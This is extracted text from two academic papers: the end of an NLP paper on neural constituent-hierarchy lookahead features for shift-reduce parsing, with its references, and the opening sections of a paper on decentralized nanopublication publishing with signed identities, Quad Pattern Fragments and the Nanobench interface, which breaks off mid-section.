(2008) used the concept of spine for TAG (Schabes, 1992; Vijay-Shanker and Joshi, 1988), which is sim- ilar to our constituent hierarchy. However, there are three differences. First, the spine is defined to de- scribe the main syntactic tree structure with a series 54 NP VP S PP SBAR ADVP ADJP WHNP QP baseline 92.06 90.63 90.28 87.93 86.93 84.83 74.12 95.03 89.32 with lookahead feature 93.10 92.45 91.78 88.84 88.59 85.64 74.50 96.18 89.63 improvement +1.04 +1.82 +1.50 +0.91 +1.66 +0.81 +0.38 +1.15 +0.31 constituent hierarchy s-type 95.18 97.51 93.37 98.01 92.14 88.94 79.88 96.18 91.70 e-type 91.98 76.82 80.72 84.80 66.82 85.01 71.16 95.13 91.02 Table 9: Comparison between the parsers with lookahead features on different phrases types, with the corresponding constituent hierarchy predictor performances. of unary projections, while constituent hierarchy is defined to describe how words can start or end hi- erarchical constituents (it can be empty if the word cannot start or end constituents). Second, spines are extracted from gold trees and used to prune the search space of parsing as hard constraints. In con- trast, we use constituent hierarchies as soft features. Third, Carreras et al. (2008) use spines to prune chart parsing, while we use constituent hierarchies to improve a linear shift-reduce parser. For lexicalized grammars, supertags can benefit parsing significantly since they contain rich syntac- tic information as almost parsing (Bangalore and Joshi, 1999). Recently, there has been a line of work on better supertagging. Zhang et al. (2010a) proposed efficient methods to obtain supertags for HPSG parsing using dependency information. Xu et al. (2015) and Vaswani et al. (2016) leverage recur- sive neural networks for supertagging for CCG pars- ing. In contrast, our models predict the constituent hierarchy instead of a single supertag for each word in the input sentence. Our constituent hierarchy predictor is also related to sequence-to-sequence learning (Sutskever et al., 2014), which has been successfully used in neural machine translation (Bahdanau et al., 2015). The neural model encodes the source-side sentence into dense vectors, and then uses them to generate target- side word by word. There has also been work that di- rectly applies sequence-to-sequence models for con- stituent parsing, which generates constituent trees given raw sentences (Vinyals et al., 2015; Luong et al., 2015). Compared to Vinyals et al. (2015), who predict a full parse tree from input, our predictors tackle a much simpler task, by predicting the con- stituent hierarchies of each word separately. In ad- dition, the outputs of the predictors are used for soft lookahead features in bottom-up parsing, rather than being taken as output structures directly. By integrating a neural constituent hierarchy pre- dictor, our parser is related to neural network mod- els for parsing, which has given competitive accura- cies for both constituency parsing (Dyer et al., 2016; Cross and Huang, 2016; Watanabe and Sumita, 2015) and dependency parsing (Chen and Manning, 2014; Zhou et al., 2015; Dyer et al., 2015). In par- ticular, our parser is more closely related to neu- ral models that integrate discrete manual features (Socher et al., 2013; Durrett and Klein, 2015). Socher et al. (2013) use neural features to rerank a sparse baseline parser; Durrett and Klein directly in- tegrate sparse features into neural layers in a chart parser. 
In contrast, we integrate neural information into sparse features in the form of lookahead fea- tures. There has also been work on lookahead features for parsing. Tsuruoka et al. (2011) run a baseline parser for a few future steps, and use the output ac- tions to guide the current action. In contrast to their model, our model leverages full sentential informa- tion, yet is significantly faster. Previous work investigated more efficient parsing without loss of accuracy, which is required by real time applications, such as web parsing. Zhang et al. (2010b) introduced a chart pruner to accelerate a CCG parser. Kummerfeld et al. (2010) proposed a self-training method focusing on increasing the speed of a CCG parser rather than its accuracy. 8 Conclusion We proposed a novel constituent hierarchy predic- tor based on recurrent neural networks, aiming to capture global sentential information. The resulting constituent hierarchies are fed to a baseline shift- reduce parser as lookahead features, addressing lim- itations of shift-reduce parsers in not leveraging 55 right-hand side syntax for local decisions, yet main- taining the same model size and speed. The resulting fully-supervised parser outperforms the state-of-the- art baseline parser by achieving 91.7% F1 on stan- dard WSJ evaluation and 85.5% F1 on standard CTB evaluation. Acknowledgments We thank the anonymous reviewers for their detailed and constructive comments, and the co-Editor-in- Chief Lillian Lee for her extremely detailed copy editing. This work is supported by T2MOE 201301 of Singapore Ministry of Education. Yue Zhang is the corresponding author. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. ICLR. Miguel Ballesteros, Chris Dyer, and Noah A. Smith. 2015. Improved transition-based parsing by modeling characters instead of words with LSTMs. In EMNLP, pages 349–359. Srinivas Bangalore and Aravind K. Joshi. 1999. Su- pertagging: An approach to almost parsing. Compu- tational Linguistics, 25(2):237–265, June. Daniel M. Bikel. 2004. On the parameter space of gener- ative lexicalized statistical parsing models. PhD The- sis, University of Pennsylvania. Xavier Carreras, Michael Collins, and Terry Koo. 2008. TAG, dynamic programming, and the perceptron for efficient, feature-rich parsing. In CoNLL, pages 9–16, Morristown, NJ, USA. Association for Computational Linguistics. Eugene Charniak and Mark Johnson. 2005. Coarse-to- fine n-best parsing and MaxEnt discriminative rerank- ing. In ACL. Eugene Charniak. 2000. A maximum-entropy-inspired parser. In ANLP, pages 132–139. Danqi Chen and Christopher Manning. 2014. A fast and accurate dependency parser using neural networks. In EMNLP, pages 740–750, Stroudsburg, PA, USA. As- sociation for Computational Linguistics. Kyunghyun Cho, Bart van Merrienboer, Çaglar Gülçehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning phrase represen- tations using RNN encoder-decoder for statistical ma- chine translation. In EMNLP, pages 1724–1734. Stephen Clark and James R. Curran. 2004. The impor- tance of supertagging for wide-coverage CCG pars- ing. In COLING, pages 282–288, Morristown, NJ, USA, August. University of Edinburgh, Association for Computational Linguistics. Stephen Clark. 2002. Supertagging for combinatory cat- egorial grammar. 
In Proceedings of the Sixth Inter- national Workshop on Tree Adjoining Grammar and Related Frameworks, pages 101–106, Universita di Venezia. Michael Collins and Brian Roark. 2004. Incremental parsing with the perceptron algorithm. In ACL, Mor- ristown, NJ, USA. Association for Computational Lin- guistics. Michael Collins. 2003. Head-driven statistical models for natural language parsing. Computational Linguis- tics, 29(4):589–637. James Cross and Liang Huang. 2016. Span-based con- stituency parsing with a structure-label system and provably optimal dynamic oracles. In EMNLP. Rebecca Dridan, Valia Kordoni, and Jeremy Nicholson. 2008. Enhancing performance of lexicalised gram- mars. In ACL. Greg Durrett and Dan Klein. 2015. Neural CRF parsing. In ACL, pages 302–312. Chris Dyer, Miguel Ballesteros, Wang Ling, Austin Matthews, and Noah A. Smith. 2015. Transition- based dependency parsing with stack long short-term memory. In ACL-IJCNLP, pages 334–343. Chris Dyer, Adhiguna Kuncoro, Miguel Ballesteros, and Noah A. Smith. 2016. Recurrent neural network grammars. In NAACL, pages 199–209. Agnieszka Faleńska, Anders Björkelund, Özlem Çetinoğlu, and Wolfgang Seeker. 2015. Stacking or supertagging for dependency parsing – what’s the difference? In Proceedings of the 14th International Conference on Parsing Technologies. Joshua Goodman. 1998. Parsing inside-out. PhD thesis, Harvard University. Alex Graves and Jürgen Schmidhuber. 2008. Offline handwriting recognition with multidimensional recur- rent neural networks. In NIPS, pages 545–552. Alex Graves, Navdeep Jaitly, and Abdel-rahman Mo- hamed. 2013. Hybrid speech recognition with deep bidirectional LSTM. In IEEE Workshop on Automatic Speech Recognition & Understanding (ASRU), pages 273–278. IEEE. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780, November. Zhongqiang Huang and Mary P. Harper. 2009. Self- training PCFG grammars with latent annotations across languages. In EMNLP, pages 832–841. 56 Zhongqiang Huang, Mary P. Harper, and Slav Petrov. 2010. Self-training with products of latent variable grammars. In EMNLP, pages 12–22. Liang Huang. 2008. Forest reranking: Discriminative parsing with non-local features. In ACL, pages 586– 594. Yoon Kim, Yacine Jernite, David Sontag, and Alexan- der M. Rush. 2016. Character-aware neural language models. In AAAI. Jonathan K. Kummerfeld, Jessika Roesner, Tim Daw- born, James Haggerty, James R. Curran, and Stephen Clark. 2010. Faster parsing by supertagger adap- tation. In ACL, pages 345–355. University of Cam- bridge, Association for Computational Linguistics, July. Minh-Thang Luong, Quoc V. Le, Ilya Sutskever, Oriol Vinyals, and Lukasz Kaiser. 2015. Multi-task se- quence to sequence learning. ICLR. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: The Penn treebank. Computational Linguistics, 19(2):313–330. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Effective self-training for parsing. In HLT- NAACL, pages 152–159, Morristown, NJ, USA. As- sociation for Computational Linguistics. Takashi Ninomiya, Takuya Matsuzaki, Yoshimasa Tsu- ruoka, Yusuke Miyao, and Jun’ichi Tsujii. 2006. Ex- tremely lexicalized models for accurate and fast HPSG parsing. In EMNLP, pages 155–163. University of Manchester, Association for Computational Linguis- tics, July. Slav Petrov and Dan Klein. 2007. Improved inference for unlexicalized parsing. In HLT-NAACL, pages 404– 411. Adwait Ratnaparkhi. 
1997. A linear observed time sta- tistical parser based on maximum entropy models. In EMNLP. Brian Roark and Kristy Hollingshead. 2009. Linear complexity context-free parsing pipelines via chart constraints. In HLT-NAACL, pages 647–655. Kenji Sagae and Alon Lavie. 2005. A classifier-based parser with linear runtime complexity. In IWPT, pages 125–132, Morristown, NJ, USA. Association for Com- putational Linguistics. Kenji Sagae and Alon Lavie. 2006. Parser combination by reparsing. In HLT-NAACL, pages 129–132, Mor- ristown, NJ, USA. Association for Computational Lin- guistics. Cicero D. Santos and Bianca Zadrozny. 2014. Learning character-level representations for part-of-speech tag- ging. In ICML, pages 1818–1826. Yves Schabes. 1992. Stochastic tree-adjoining gram- mars. In Proceedings of the workshop on Speech and Natural Language, pages 140–145. Association for Computational Linguistics. Mike Schuster and Kuldip K. Paliwal. 1997. Bidirec- tional recurrent neural networks. Signal Processing, IEEE transaction, 45(11):2673–2681. Hiroyuki Shindo, Yusuke Miyao, Akinori Fujino, and Masaaki Nagata. 2012. Bayesian symbol-refined tree substitution grammars for syntactic parsing. In ACL, pages 440–448. Richard Socher, John Bauer, Christopher D. Manning, and Andrew Y. Ng. 2013. Parsing with compositional vector grammars. In ACL, pages 455–465. Ilya Sutskever, James Martens, George E. Dahl, and Ge- offrey E. Hinton. 2013. On the importance of ini- tialization and momentum in deep learning. In ICML, pages 1139–1147. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In NIPS, pages 3104–3112. Yoshimasa Tsuruoka, Yusuke Miyao, and Jun’ichi Kazama. 2011. Learning with lookahead: Can history-based models rival globally optimized models? In CoNLL, pages 238–246. Ashish Vaswani, Yonatan Bisk, and Kenji Sagae. 2016. Supertagging with LSTMs. In NAACL. K. Vijay-Shanker and Aravind K. Joshi. 1988. A study of tree adjoining grammars. Citeseer. Oriol Vinyals, Lukasz Kaiser, Terry Koo, Slav Petrov, Ilya Sutskever, and Geoffrey E. Hinton. 2015. Gram- mar as a foreign language. In NIPS, pages 2773–2781. Zhiguo Wang and Nianwen Xue. 2014. Joint POS tag- ging and transition-based constituent parsing in Chi- nese with non-local features. In ACL, pages 733–742, Stroudsburg, PA, USA. Association for Computational Linguistics. Zhiguo Wang, Haitao Mi, and Nianwen Xue. 2015. Feature optimization for constituent parsing via neu- ral networks. In ACL-IJCNLP, pages 1138–1147, Stroudsburg, PA, USA. Association for Computational Linguistics. Taro Watanabe and Eiichiro Sumita. 2015. Transition- based neural constituent parsing. In ACL, pages 1169– 1179. Wenduan Xu, Michael Auli, and Stephen Clark. 2015. CCG supertagging with a recurrent neural network. In ACL-IJCNLP, pages 250–255, Stroudsburg, PA, USA. Association for Computational Linguistics. Naiwen Xue, Fei Xia, Fu-dong Chiou, and Martha Palmer. 2005. The Penn Chinese treebank: Phrase structure annotation of a large corpus. Natural Lan- guage Engineering, 11(2):207–238. 57 Yue Zhang and Stephen Clark. 2009. Transition-based parsing of the Chinese treebank using a global discrim- inative model. In ICPT, pages 162–171, Morristown, NJ, USA. Association for Computational Linguistics. Yue Zhang and Stephen Clark. 2011. Syntactic process- ing using the generalized perceptron and beam search. Computational Linguistics, 37(1):105–151. Yaozhong Zhang, Takuya Matsuzaki, and Jun’ichi Tsu- jii. 2010a. 
work_22tktt3z4fczfipon3agmpyoeq ----
Semantic micro-contributions with decentralized nanopublication services
Tobias Kuhn1, Ruben Taelman2, Vincent Emonet3, Haris Antonatos4, Stian Soiland-Reyes5,6 and Michel Dumontier3
1 Department of Computer Science, VU Amsterdam, Amsterdam, Netherlands 2 IDLab, Ghent University, Ghent, Belgium 3 Institute of Data Science, Maastricht University, Maastricht, Netherlands 4 SciFY, Athens, Greece 5 Informatics Institute, University of Amsterdam, Amsterdam, Netherlands 6 Department of Computer Science, The University of Manchester, Manchester, UK
ABSTRACT While the publication of Linked Data has become increasingly common, the process tends to be a relatively complicated and heavy-weight one. Linked Data is typically published by centralized entities in the form of larger dataset releases, which has the downside that there is a central bottleneck in the form of the organization or individual responsible for the releases. Moreover, certain kinds of data entries, in particular those with subjective or original content, currently do not fit into any existing dataset and are therefore more difficult to publish. To address these problems, we present here an approach to use nanopublications and a decentralized network of services to allow users to directly publish small Linked Data statements through a simple and user-friendly interface, called Nanobench, powered by semantic templates that are themselves published as nanopublications. The published nanopublications are cryptographically verifiable and can be queried through a redundant and decentralized network of services, based on the grlc API generator and a new quad extension of Triple Pattern Fragments. We show here that these two kinds of services are complementary and together allow us to query nanopublications in a reliable and efficient manner. We also show that Nanobench makes it indeed very easy for users to publish Linked Data statements, even for those who have no prior experience in Linked Data publishing.
Subjects Human-Computer Interaction, Digital Libraries, World Wide Web and Web Science
Keywords Nanopublications, Semantic Web, Linked data, Semantic publishing
INTRODUCTION Linked Data has achieved remarkable adoption (Bizer, Heath & Berners-Lee, 2011; Schmachtenberg, Bizer & Paulheim, 2014), but its publication has remained a complicated issue. The most popular methods for publishing Linked Data include subject pages (Berners-Lee, 2009), SPARQL endpoints (Feigenbaum et al., 2013), and data dumps. The latter are essentially just RDF files on the web.
Such files are not regularly indexed on a global scale by any of the existing search engines and therefore often lack discoverability, but they are the only option that does not require the setup of a web server for users wanting to publish Linked Data on their own. While one of the fundamental ideas behind the web is that anyone should be able to express themselves, Linked Data publishing is therefore mostly done by large centralized entities such as DBpedia (Auer et al., 2007) and Wikidata (Vrandečić & Krötzsch, 2014). Even such community-driven datasets have clear guidelines on what kind of data may be added and typically do not allow for subjective or original content, such as personal opinions or new scientific findings that have otherwise not yet been published. It is therefore difficult for web users to publish their own personal pieces of Linked Data in a manner that the published data can be easily discovered, queried, and aggregated. To solve these shortcomings, we propose here a complementary approach to allow for what we call semantic micro-contributions. In contrast to the existing Linked Data publishing paradigms, semantic micro-contributions allow individual web users to easily and independently publish small snippets of Linked Data. We show below how such semantic micro-contributions can be achieved with nanopublications and semantic templates, and how we can make such a system redundant and reliable with a decentralized network of services. We will explain below how this approach differs from other decentralization approaches that have been proposed in the context of Linked Data publishing (including Solid and Blockchain-based approaches). Concretely, we investigate here the research question of how we can build upon the existing nanopublication publishing ecosystem to provide query services and intuitive user interfaces that allow for quick and easy publishing of small Linked Data contributions in a decentralized fashion. Our concrete contributions are: 1. a concrete scheme of how nanopublications can be digitally signed and thereby reliably linked to user identities, 2. two complementary sets of nanopublication query services building upon extensions of existing Linked Data technologies, one based on the grlc API generator and the other one in the form of an extension of Triple Pattern Fragments called Quad Pattern Fragments (QPF), 3. a user interface connecting to these services that allows for simple nanopublication publishing based on the new concept of nanopublication templates, and 4. positive evaluation results on the above-mentioned query services and user interface.
Below, we outline the relevant background, introduce the details of our approach, present and discuss the design and results of two evaluations, and outline future work. BACKGROUND Before we introduce our approach, we give here the relevant background in terms of our own previous work, and other related research on the topics of the use of semantic technologies for scientific publishing, Linked Data APIs, and decentralization. Under the label of semantic publishing (Shotton, 2009), a number of approaches have been presented to align research and its outcomes with Linked Data in order to better organize, aggregate, and interpret scientific findings and science as a whole. We have previously argued that these Linked Data representations should ideally come directly from the authors (i.e., the researchers), should cover not just metadata properties but the content of the scientific findings themselves, and should become the main publication object instead of papers with narrative text, in what we called genuine semantic publishing Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 2/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ (Kuhn & Dumontier, 2017). Nanopublications (Mons et al., 2011) are one of the most prominent proposals to implement this. They are small independent pieces of Linked Data that encapsulate atomic statements in the form of a few RDF triples (this part is called the assertion graph) together with formal provenance information (the provenance graph, e.g., pointing to the study that the assertion was derived from) and metadata (the publication info graph, e.g., by whom and when was the nanopublication created). While the original nanopublication proposal focused on assertions with domain statements (such as expressing a link between a gene and a disease), we subsequently suggested to broaden their scope and to use them also to express bibliographic and other meta-level information, statements about other nanopublications, vocabulary definitions, and generally any kind of small and coherent snippet of Linked Data (Kuhn et al., 2013). In order to make nanopublications verifiable and to enforce their immutability, we then showed how cryptographic hash values can be calculated on their content and included in their identifiers in the form of trusty URIs (Kuhn & Dumontier, 2015). Based on this, we established a decentralized and open server network, through which anybody can reliably publish and retrieve nanopublications (Kuhn et al., 2016), and we introduced index nanopublications, which allow for assigning nanopublications to versions of larger datasets (Kuhn et al., 2017). The work to be presented below is a continuation of this research line, adding query services and an intuitive publishing interface as components to this ecosystem. Our general approach is partly related to semantic wikis, for example, Ghidini et al. (2009), Baumeister, Reutelshoefer & Puppe (2011) and Kuhn (2008). They combine the ideas of the Semantic Web with the wiki concept, and therefore allow for quick and easy editing of semantic data. They focus on the collaborative process of consensus finding and its result in the form of a single coherent formal knowledge base, and as such, they focus less on individual contributions as the unit of reference. In terms of Linked Data APIs, SPARQL endpoints (Feigenbaum et al., 2013) are probably the most well-known example and they are often used for providing queryable access to RDF datasets. 
In practice, such endpoints often suffer from availability problems (Buil-Aranda et al., 2013), due to their public nature and the uncontrolled complexity of SPARQL queries. The Linked Data Fragments (LDF) framework (Verborgh et al., 2016) was initiated as an attempt to investigate alternative RDF query interfaces, where the total query effort can be distributed between server and client. Triple Pattern Fragments (TPF) (Verborgh et al., 2016), for example, heavily reduce the expressivity of queries that can be evaluated by a server, so clients that want answers to more complex SPARQL queries need to take up part of the execution load themselves. Through client-side query engines, such as Comunica (Taelman et al., 2018), complex SPARQL queries can be split into multiple triple pattern queries that can be executed separately by a TPF server and then joined to create the full result on the client-side. Another approach to address the problems of full SPARQL endpoints is grlc (Meroño-Peñuela & Hoekstra, 2016), a tool that automatically generates APIs from SPARQL templates. By providing a small number of possible API operations instead of SPARQL’s virtually unlimited query possibilities, grlc makes Linked Data access easier and better manageable on both, the client and server Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 3/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ side. A further noteworthy technology is the Linked Data Platform (LDP) (Speicher, Arwe & Malhotra, 2015) to manage and provide Linked Data. In order to establish connections between producers and consumers of Linked Data, subscription and notification protocols such as WebSub (https://www.w3.org/TR/websub/) and provenance pingbacks (https://www.w3.org/TR/prov-aq/#provenance-pingback) have been proposed. The approaches above mostly assume requests are targeted towards a central server. This centralization comes with the downsides that such a server forms a single point of failure, that we need to trust in the authority that runs it, and that it is difficult to scale. To address these problems, a number of more decentralized approaches have been proposed. LDF interfaces such as TPF, as introduced above, can in fact also be used in a more distributed fashion, as fragments can be published across different servers (Delva et al., 2019). Distributed approaches to semantically annotate web pages like https://schema.org/ (Guha, Brickley & Macbeth, 2016) have moreover shown strong adoption. Another example is Solid (Mansour et al., 2016), where users have their own personal Linked Data pod, in which they can store their own data and thereby are in full control of who can access it. Solid thereby targets personal and potentially confidential data, with a focus on access control and minimizing data duplication. The Solid ecosystem has been applied in a number of use cases, such as collaboration within decentralized construction projects (Werbrouck et al., 2020), and decentralization of citizen data within governments (Buyle et al., 2019). Such approaches where data is distributed but not replicated, however, often lead to major difficulties when queries need to be executed over such a federation of data sources (Taelman, Steyskal & Kirrane, 2020). This stands in contrast to decentralized approaches where data is not only distributed but also replicated, which typically target open and public data and have an emphasis on scalability and reliability. 
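To make the client-side query splitting over TPF-style interfaces mentioned above a bit more tangible, the following is a deliberately simplified sketch. It is not how Comunica is implemented; the endpoint URL, the parameter names, and the absence of paging are simplifying assumptions, and the control metadata contained in real fragment responses is simply filtered out by predicate.

# Much-simplified sketch of client-side joining over a TPF-style interface:
# each triple pattern is fetched separately from the server, and the join is
# computed on the client. Endpoint URL and parameter names are assumptions;
# real engines (e.g., Comunica) additionally handle paging, the declared
# hypermedia controls, and join ordering.
import requests
from rdflib import Graph

FRAGMENT_API = "https://example.org/fragments"  # hypothetical TPF endpoint
FOAF = "http://xmlns.com/foaf/0.1/"

def fetch_pattern(s=None, p=None, o=None):
    """Return the triples matching one pattern as tuples of strings."""
    params = {k: v for k, v in
              {"subject": s, "predicate": p, "object": o}.items() if v}
    resp = requests.get(FRAGMENT_API, params=params,
                        headers={"Accept": "text/turtle"})
    g = Graph()
    g.parse(data=resp.text, format="turtle")
    # Keep only the data triples; fragment metadata uses other predicates.
    return [(str(a), str(b), str(c)) for a, b, c in g
            if p is None or str(b) == p]

# Two-pattern query: ?person foaf:knows ?friend . ?friend foaf:name ?name
for person, _, friend in fetch_pattern(p=FOAF + "knows"):
    for _, _, name in fetch_pattern(s=friend, p=FOAF + "name"):
        print(person, "knows", friend, "named", name)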
Blockchain-based solutions fall into the latter category, for which a whole range exists of possible approaches to integrate Linked Data (Third & Domingue, 2017). A core trade-off of all blockchain-based approaches is to either sacrifice some degree of decentralization with permissioned blockchains or to pay the price of the expensive mining process. For applications that do not crucially depend on a fixed and agreed-upon order of events, as cryptocurrencies do for their transaction ledger, the costs of Blockchain-based solutions in fact often do not seem to offset their benefits. Our approach to be presented below also falls into this second category of decentralization approaches with replicated data sources, but does not entail the costs of Blockchain-based approaches. APPROACH The approach to be presented here, as shown in Fig. 1, is based on our work on nanopublications and the ecosystem for publishing them, as introduced above. The core of this new approach is to allow end-users to directly publish Linked Data snippets in the form of nanopublications with our existing decentralized nanopublication publishing network through an interface powered by semantic templates, which are themselves published as nanopublications. Below we explain how users can establish their identity by announcing their public key, and how they can then sign, publish, and update their Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 4/23 https://www.w3.org/TR/websub/ https://www.w3.org/TR/prov-aq/#provenance-pingback https://schema.org/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ nanopublications. Then we describe our extension of Triple Pattern Fragments to support quads and thereby nanopublications. Next, we show how we defined two complementary sets of services on top of the existing nanopublication network to query and access the published data in a redundant and reliable way. Finally, we explain how these components together with semantic templates allowed us to build a flexible and intuitive end-user application called Nanobench. Identities and updates Nanopublications typically specify their creator in the publication info graph, but because anybody can publish anything they want through the existing open nanopublication network, there is no guarantee that this creator link is accurate. For that reason, we propose here a method to add a digital signature to the publication graph. With our approach, users have to first introduce their identifier and public key before they can publish their own nanopublications. This introduction is itself published as a signed nanopublication declaring the link between the personal identifier (such as an ORCID identifier) and the public key in its assertion graph, as shown by this example: sub:assertion { sub:keyDeclaration npx:declaredBy orcid:0000-0001-2345-6789 ; npx:hasAlgorithm "RSA"; npx:hasPublicKey "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQK…" . } Below, we will come back to the question of how we can ensure that this user is indeed in control of the stated ORCID identifier. Once an identity is established in this way, the respective user can publish nanopublications such as the one shown in Fig. 2, where the personal identifier and the public key are mentioned in the publication info graph (yellow) together with the digital signature that is calculated with the respective private key on the entire nanopublication, excluding only the npx:hasSignature triple and the hash code of the trusty URI. 
The trusty URI (here represented with the prefix this: ) is Figure 1 The architecture of our overall approach. Full-size DOI: 10.7717/peerj-cs.387/fig-1 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 5/23 http://dx.doi.org/10.7717/peerj-cs.387/fig-1 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ calculated as a last step, which therefore also covers the signature. This makes the nanopublication including its signature verifiable and immutable. Immutability is a desirable property to ensure stable and reliable linking, but for practical purposes it has to come with a mechanism to declare updates and mark obsolete entries. With our approach, new versions of a nanopublication can be declared with the npx:supersedes property in the publication info graph of the nanopublication containing the update, for example: sub:pubinfo { this: npx:supersedes . … } In order to declare a nanopublication obsolete without an update, the npx:retracts property can be used in the assertion graph of a separate retraction nanopublication, for example: sub:assertion { orcid:0000-0001-2345-6789 npx:retracts . } Figure 2 Example nanopublication in TriG notation that was published with Nanobench. Full-size DOI: 10.7717/peerj-cs.387/fig-2 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 6/23 http://dx.doi.org/10.7717/peerj-cs.387/fig-2 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Of course, updated versions and retractions should only be considered valid if authorized by the author of the original nanopublication. For the scope of this work, we only consider them valid if the retraction or update is signed with the same key pair, but more flexible solutions are possible in the future. The elements introduced so far allow us to cryptographically verify that given nanopublications were published by the same user who introduced herself in her introduction nanopublication, but they still allow anybody to claim any ORCID identifier (or other kind of identifier). To add this missing link, users can add the link of their introduction nanopublication to their ORCID profile under “Websites & Social Links”, which proves that they have control of that account. This link is represented with foaf:page when the user identifier is resolved with a HTTP GET request asking for an RDF representation via content negotiation. This is thereby a general method that can work on any URL scheme and identification mechanism providing dereferenceable user identifiers, but for simplicity we will restrict our discussion here to ORCID identifiers. Quad pattern fragments Nanopublications, as can be seen in Fig. 2, are represented as four named RDF graphs. Triple Pattern Fragments, however, as their names indicates, only support triples and not quads (which include the graph information), and TPF is therefore insufficient for querying nanopublications. For this reason, we introduce an extension of TPF to support quads, called Quad Pattern Fragments (QPF) (https://linkeddatafragments.org/ specification/quad-pattern-fragments/). In order to allow querying over QPF, its HTTP responses include metadata that declaratively describe the controls via which querying is possible. These controls are defined in a similar way as for TPF using the Hydra Core vocabulary (Lanthaler & Gütl, 2013), and allows intelligent query engines to detect and use them. Below, an example of these controls is shown: @prefix rdf: . @prefix hydra: . @prefix void: . @prefix sd: . 
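As a rough illustration of the signing step described above, consider the following Python sketch. It is only a conceptual approximation under simplifying assumptions: the actual tooling (e.g., nanopub-java) applies the specific trusty URI normalization to the quads before hashing and signing, whereas this sketch just sorts a list of quads, signs the resulting byte string with RSA and SHA-256, and Base64-encodes the result as it would appear in the npx:hasSignature triple.

# Conceptual sketch of signing a nanopublication's content (simplified; the
# real normalization is the one defined for trusty URIs, not a plain sort).
import base64
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

def sign_quads(quads, private_key):
    """Sign a list of (subject, predicate, object, graph) string tuples."""
    payload = "\n".join(" ".join(q) for q in sorted(quads)).encode("utf-8")
    signature = private_key.sign(payload, padding.PKCS1v15(), hashes.SHA256())
    return base64.b64encode(signature).decode("ascii")  # -> npx:hasSignature

# Example with a freshly generated RSA key pair and a single assertion triple:
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
quads = [("orcid:0000-0001-2345-6789", "foaf:knows",
          "orcid:0000-0002-1825-0097", "sub:assertion")]
print(sign_quads(quads, key))

Verification works analogously with the public key that the user declared in their introduction nanopublication.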
a void:Dataset, hydra:Collection; void:subset ; sd:defaultGraph ; hydra:search _:pattern. _:pattern hydra:template "https://example.org/{?s,p,o,g}"; hydra:variableRepresentation hydra:ExplicitRepresentation; hydra:mapping _:subject, _:predicate, _:object, _:graph. _:subject hydra:variable "s"; hydra:property rdf:subject. _:predicate hydra:variable "p"; hydra:property rdf:predicate. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 7/23 https://linkeddatafragments.org/specification/quad-pattern-fragments/ https://linkeddatafragments.org/specification/quad-pattern-fragments/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ _:object hydra:variable "o"; hydra:property rdf:object. _:graph hydra:variable "g"; hydra:property sd:graph. The control above indicates that the QPF API accepts four URL parameters, corresponding to the four elements of a quad. For example, a query to this API for the pattern ?s npx:retracts ?o sub:assertion would result in an HTTP request for the URL https://example.org/?p=npx:retracts&g=sub:assertion1. Just like with TPF, intelligent clients can be built that can handle more complex queries (such as SPARQL queries) over QPF APIs. This requires these clients to split up a SPARQL query into multiple quad patterns, which can be resolved by the API, after which they can be joined by the client to form a complete query result. QPF has been designed to be backwards-compatible with TPF. This means that clients that implement support for TPF APIs, but do not understand the notion of QPF, will be able to recognize the API as TPF, and execute triple pattern queries against it. Due to the declaratively described QPF and TPF controls, clients such as the Comunica engine can recognize and make use of both variants next to each other. A live version of a QPF API can be found at https://ldf.nanopubs.knows.idlab.ugent.be/np, which is one of six instances of this service in our network2. Nanopublication services Nanopublications can be reliably and redundantly published by uploading them to the existing nanopublication server network (Kuhn et al., 2016), which at the time of writing consists of eleven severs in five countries and storing more than 10 million nanopublications (http://purl.org/nanopub/monitor). This network implements a basic publishing layer where nanopublications can be looked up by their trusty URI, but no querying features are provided. In order to allow for querying of the nanopublications’ content, we present here our implementation of a new service layer built on top of the existing publication layer. While we are using a triple store with SPARQL under the hood, we do not provide a full-blown SPARQL endpoint to users in order to address the above-mentioned problems of availability and scalability. For our nanopublication service layer, we employ a mix of two kinds of services that are more restricted than SPARQL but also more scalable. The first kind of service is based on LDF via our QPF API, as introduced above, and allows only for simple queries at the level of individual RDF statements but does not impose further restrictions. The second one is based on the grlc API generator (Meroño-Peñuela & Hoekstra, 2016), which optionally comes with the Tapas HTML interface (Lisena et al., 2019) and which can be used to execute complex queries but is restricted to a small number of predefined patterns. 
